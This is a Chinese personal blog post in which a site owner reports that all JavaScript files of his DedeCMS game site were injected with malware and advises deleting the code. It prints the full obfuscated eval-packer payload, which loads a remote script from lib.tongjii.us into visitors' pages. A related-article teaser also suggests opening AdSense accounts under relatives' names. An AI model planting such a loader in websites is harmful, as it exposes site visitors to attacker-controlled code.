当前位置:首页 > 计算机相关 > 建站之路 > 正文内容

lib.tongjii.us 病毒分析 DEDECMS被植入此病毒

piikee7年前 (2017-06-17)建站之路612
很久以前,369手游网一直打开被谷歌浏览器提示提示页面有病毒,一开始以为自己浏览器被什么病毒劫持或者DNS劫持。最近重启369手游网,又出现这个问题,分析了一下找到了原因。原来是网站被植入病毒了。所有JS页面都被放入这段代码:
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('12(T(p,a,c,k,e,d){e=T(c){U(c<a?\'\':e(1f(c/a)))+((c=c%a)>1e?W.1d(c+1h):c.13(11))};X(!\'\'.V(/^/,W)){Y(c--){d[e(c)]=k[c]||e(c)}k=[T(e){U d[e]}];e=T(){U\'\\\\w+\'};c=1};Y(c--){X(k[c]){p=p.V(10 14(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}U p}(\'v(l(p,a,c,k,e,d){e=l(c){m c.n(z)};q(!\\\'\\\'.t(/^/,B)){r(c--){d[c.n(a)]=k[c]||c.n(a)}k=[l(e){m d[e]}];e=l(){m\\\'\\\\\\\\w+\\\'};c=1};r(c--){q(k[c]){p=p.t(C D(\\\'\\\\\\\\b\\\'+e(c)+\\\'\\\\\\\\b\\\',\\\'g\\\'),k[c])}}m p}(\\\'1 4=4||[];(b(){1 2=5.e(\\\\\\\'7\\\\\\\');2.a=\\\\\\\'8://9.d.f/k.6?//i.6?g\\\\\\\';1 3=5.j(\\\\\\\'7\\\\\\\')[0];3.h.c(2,3)})();\\\',o,o,\\\'|y|u|s|E|x|A|G|Q|N|P|l|R|S|O|L|M|F|H|I|K\\\'.J(\\\'|\\\'),0,{}))\',Z,Z,\'|||||||||||||||||||||T|U|13|17||X|Y||V|1m|12||1q|1r|11|1n|W|10|14|1l|1o|1c|1k|1i|15|1j|1s|1p|1g|19|18|16|1b|1a\'.15(\'|\'),0,{}))',62,91,'|||||||||||||||||||||||||||||||||||||||||||||||||||||||function|return|replace|String|if|while|55|new|36|eval|toString|RegExp|split|http|21|src|createElement|tongjii|insertBefore|script|fromCharCode|35|parseInt|lib|29|getElementsByTagName|tj|google|_hmt_en|hm_en|js|parentNode|41d12a21b4e1a726d4a651685b118811662033874|document|var|us'.split('|'),0,{}))

解决办法:
所有JS文件查找一下这段代码删除即可。。

扫描二维码推送至手机访问。

版权声明:本文由萍客小居发布,如需转载请注明出处。

本文链接:https://www.piikee.net/1259.html

分享给朋友:

相关文章

Google AdSense 最新申请方法汇总

关键是 收款人 ,一个人名不能多帐户,收钱时必须真实地址,同一个人同一个地址多个账号很危险。所以用亲戚朋友姓名申请,一个人一个号,申请时地址可以变化,以后可以改。也就是说,只要有个收款人名字就行了,地址信息与网站匹配!方法1  [推荐]利用...

asp站点com1.gupiao.asp,prn.gupiao.asp木马清除方法

很不幸,不知什么时候网站被挂马了!网站的跟目录被加了几个文件,怎么删也删不掉,而且过一段时间还会自动在 ASP 的网站首页插一段<div class=sera><ul><li style='float:left...

如何开通GoDaddy的免费空间

如何开通GoDaddy的免费空间

只要在 GoDaddy 注册了域名,就可以得到一个10G的免费空间。很多朋友在注册域名后,不知道如何开通GoDaddy的10G免费空间,下面就一步一步地介绍 GoDaddy的免费空间的开通方法。(1). 点击 My Account,登录帐号...

netfirms免费空间去广告代码

netfirms免费空间头部都有一个广告条,把下面代码放入body 里面即可实现隐藏广告条。<script><!-- 转载请注明来自萍客小居www.piikee.net -->var table1 = documen...

IIS7.5只能上传2M,discuz论坛附件上传失败的解决办法

问题:IS7.5只能上传2M的数据,discuz论坛附件上传显示100%,然后显示上传失败,后台找不到附件。网上一般解决方案:IIS修改方案:1. 修改IIS的applicationhost.config打开 %windir%\system...

解决PHP-CGI爆满问题

解决PHP-CGI爆满问题在C:\WINDOWS\system32\inetsrv\fcgiext.ini 文件中可以设定php-cgi进程相关参数,如:打开这个文件, 并用查找的方式 来查找maxInstances=把这个值改小建议 51...

lillian
lillian
6年前 (2018-01-12)

赞!

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。